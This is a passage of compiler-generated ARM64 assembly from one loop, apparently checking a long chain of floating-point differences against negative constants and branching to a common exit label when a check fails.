str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_45
LBB1_45: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #112]
fcvt d2, s0
ldur s0, [x29, #-124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-8.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_55
b LBB1_46
LBB1_46: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-56]
fcvt d2, s0
ldur s0, [x29, #-124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-19.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_55
b LBB1_47
LBB1_47: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-48]
fcvt d2, s0
ldur s0, [x29, #-124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-7.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_55
b LBB1_48
LBB1_48: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-128]
fcvt d2, s0
ldur s0, [x29, #-124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-11.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_55
b LBB1_49
LBB1_49: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-72]
fcvt d2, s0
ldur s0, [x29, #-124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-16.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_55
b LBB1_50
LBB1_50: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-144]
fcvt d2, s0
ldur s0, [x29, #-124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-18.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_55
b LBB1_51
LBB1_51: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #152]
fcvt d2, s0
ldur s0, [x29, #-124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-18.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_55
b LBB1_52
LBB1_52: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-136]
fcvt d2, s0
ldur s0, [x29, #-124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-17.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_55
b LBB1_53
LBB1_53: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-112]
fcvt d2, s0
ldur s0, [x29, #-124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-20.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_55
b LBB1_54
LBB1_54: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-120]
fcvt d2, s0
ldur s0, [x29, #-124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-10.00000000
fcmp d0, d1
cset w8, ne
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_55
LBB1_55: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-48]
fcvt d2, s0
ldur s0, [x29, #-108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-8.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_56
LBB1_56: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-80]
fcvt d2, s0
ldur s0, [x29, #-108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-13.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_57
LBB1_57: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #120]
fcvt d2, s0
ldur s0, [x29, #-108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-12.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_58
LBB1_58: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-72]
fcvt d2, s0
ldur s0, [x29, #-108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-14.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_59
LBB1_59: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-64]
fcvt d2, s0
ldur s0, [x29, #-108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-10.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_60
LBB1_60: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-144]
fcvt d2, s0
ldur s0, [x29, #-108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-15.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_61
LBB1_61: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-136]
fcvt d2, s0
ldur s0, [x29, #-108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-19.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_62
LBB1_62: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-104]
fcvt d2, s0
ldur s0, [x29, #-108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-13.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_63
LBB1_63: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-112]
fcvt d2, s0
ldur s0, [x29, #-108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-11.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_64
LBB1_64: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-120]
fcvt d2, s0
ldur s0, [x29, #-108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-18.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_65
LBB1_65: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-48]
fcvt d2, s0
ldur s0, [x29, #-108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-8.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_75
b LBB1_66
LBB1_66: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-80]
fcvt d2, s0
ldur s0, [x29, #-108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-13.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_75
b LBB1_67
LBB1_67: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #120]
fcvt d2, s0
ldur s0, [x29, #-108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-12.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_75
b LBB1_68
LBB1_68: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-72]
fcvt d2, s0
ldur s0, [x29, #-108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-14.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_75
b LBB1_69
LBB1_69: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-64]
fcvt d2, s0
ldur s0, [x29, #-108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-10.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_75
b LBB1_70
LBB1_70: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-144]
fcvt d2, s0
ldur s0, [x29, #-108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-15.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_75
b LBB1_71
LBB1_71: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-136]
fcvt d2, s0
ldur s0, [x29, #-108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-19.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_75
b LBB1_72
LBB1_72: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-104]
fcvt d2, s0
ldur s0, [x29, #-108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-13.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_75
b LBB1_73
LBB1_73: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-112]
fcvt d2, s0
ldur s0, [x29, #-108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-11.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_75
b LBB1_74
LBB1_74: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-120]
fcvt d2, s0
ldur s0, [x29, #-108]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-18.00000000
fcmp d0, d1
cset w8, ne
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_75
LBB1_75: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #104]
fcvt d2, s0
ldr s0, [sp, #92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-6.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_76
LBB1_76: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-80]
fcvt d2, s0
ldr s0, [sp, #92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-7.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_77
LBB1_77: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-128]
fcvt d2, s0
ldr s0, [sp, #92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-12.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_78
LBB1_78: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-72]
fcvt d2, s0
ldr s0, [sp, #92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-11.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_79
LBB1_79: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-144]
fcvt d2, s0
ldr s0, [sp, #92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-4.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_80
LBB1_80: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #152]
fcvt d2, s0
ldr s0, [sp, #92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-11.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_81
LBB1_81: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-136]
fcvt d2, s0
ldr s0, [sp, #92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-5.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_82
LBB1_82: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #96]
fcvt d2, s0
ldr s0, [sp, #92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-12.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_83
LBB1_83: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-120]
fcvt d2, s0
ldr s0, [sp, #92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-4.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_84
LBB1_84: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-104]
fcvt d2, s0
ldr s0, [sp, #92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-6.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_85
LBB1_85: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #104]
fcvt d2, s0
ldr s0, [sp, #92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-6.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_95
b LBB1_86
LBB1_86: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-80]
fcvt d2, s0
ldr s0, [sp, #92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-7.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_95
b LBB1_87
LBB1_87: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-128]
fcvt d2, s0
ldr s0, [sp, #92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-12.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_95
b LBB1_88
LBB1_88: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-72]
fcvt d2, s0
ldr s0, [sp, #92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-11.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_95
b LBB1_89
LBB1_89: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-144]
fcvt d2, s0
ldr s0, [sp, #92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-4.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_95
b LBB1_90
LBB1_90: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #152]
fcvt d2, s0
ldr s0, [sp, #92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-11.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_95
b LBB1_91
LBB1_91: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-136]
fcvt d2, s0
ldr s0, [sp, #92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-5.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_95
b LBB1_92
LBB1_92: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #96]
fcvt d2, s0
ldr s0, [sp, #92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-12.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_95
b LBB1_93
LBB1_93: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-120]
fcvt d2, s0
ldr s0, [sp, #92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-4.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_95
b LBB1_94
LBB1_94: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-104]
fcvt d2, s0
ldr s0, [sp, #92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-6.00000000
fcmp d0, d1
cset w8, ne
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_95
LBB1_95: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #112]
fcvt d2, s0
ldur s0, [x29, #-92]
fcvt d0, s0
fmov d1, #-1.00000000
fmadd d0, d1, d0, d2
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_96
LBB1_96: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #104]
fcvt d2, s0
ldur s0, [x29, #-92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-5.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_97
LBB1_97: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-56]
fcvt d2, s0
ldur s0, [x29, #-92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-11.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_98
LBB1_98: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-80]
fcvt d2, s0
ldur s0, [x29, #-92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-20.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_99
LBB1_99: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-72]
fcvt d2, s0
ldur s0, [x29, #-92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-12.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_100
LBB1_100: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #128]
fcvt d2, s0
ldur s0, [x29, #-92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-16.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_101
LBB1_101: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-144]
fcvt d2, s0
ldur s0, [x29, #-92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-14.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_102
LBB1_102: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #96]
fcvt d2, s0
ldur s0, [x29, #-92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-9.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_103
LBB1_103: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-120]
fcvt d2, s0
ldur s0, [x29, #-92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-19.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_104
LBB1_104: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-104]
fcvt d2, s0
ldur s0, [x29, #-92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-20.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_105
LBB1_105: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #112]
fcvt d2, s0
ldur s0, [x29, #-92]
fcvt d0, s0
fmov d1, #-1.00000000
fmadd d0, d1, d0, d2
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_115
b LBB1_106
LBB1_106: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #104]
fcvt d2, s0
ldur s0, [x29, #-92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-5.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_115
b LBB1_107
LBB1_107: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-56]
fcvt d2, s0
ldur s0, [x29, #-92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-11.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_115
b LBB1_108
LBB1_108: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-80]
fcvt d2, s0
ldur s0, [x29, #-92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-20.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_115
b LBB1_109
LBB1_109: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-72]
fcvt d2, s0
ldur s0, [x29, #-92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-12.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_115
b LBB1_110
LBB1_110: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #128]
fcvt d2, s0
ldur s0, [x29, #-92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-16.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_115
b LBB1_111
LBB1_111: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-144]
fcvt d2, s0
ldur s0, [x29, #-92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-14.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_115
b LBB1_112
LBB1_112: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #96]
fcvt d2, s0
ldur s0, [x29, #-92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-9.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_115
b LBB1_113
LBB1_113: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-120]
fcvt d2, s0
ldur s0, [x29, #-92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-19.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_115
b LBB1_114
LBB1_114: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-104]
fcvt d2, s0
ldur s0, [x29, #-92]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-20.00000000
fcmp d0, d1
cset w8, ne
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_115
LBB1_115: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #112]
fcvt d2, s0
ldur s0, [x29, #-140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-3.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_116
LBB1_116: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #104]
fcvt d2, s0
ldur s0, [x29, #-140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-19.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_117
LBB1_117: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-56]
fcvt d2, s0
ldur s0, [x29, #-140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-16.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_118
LBB1_118: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-48]
fcvt d2, s0
ldur s0, [x29, #-140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-18.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_119
LBB1_119: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-144]
fcvt d2, s0
ldur s0, [x29, #-140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-6.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_120
LBB1_120: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-136]
fcvt d2, s0
ldur s0, [x29, #-140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-4.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_121
LBB1_121: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-88]
fcvt d2, s0
ldur s0, [x29, #-140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-14.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_122
LBB1_122: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-104]
fcvt d2, s0
ldur s0, [x29, #-140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-14.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_123
LBB1_123: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-112]
fcvt d2, s0
ldur s0, [x29, #-140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-6.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_124
LBB1_124: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-120]
fcvt d2, s0
ldur s0, [x29, #-140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-19.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_125
LBB1_125: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #112]
fcvt d2, s0
ldur s0, [x29, #-140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-3.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_135
b LBB1_126
LBB1_126: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #104]
fcvt d2, s0
ldur s0, [x29, #-140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
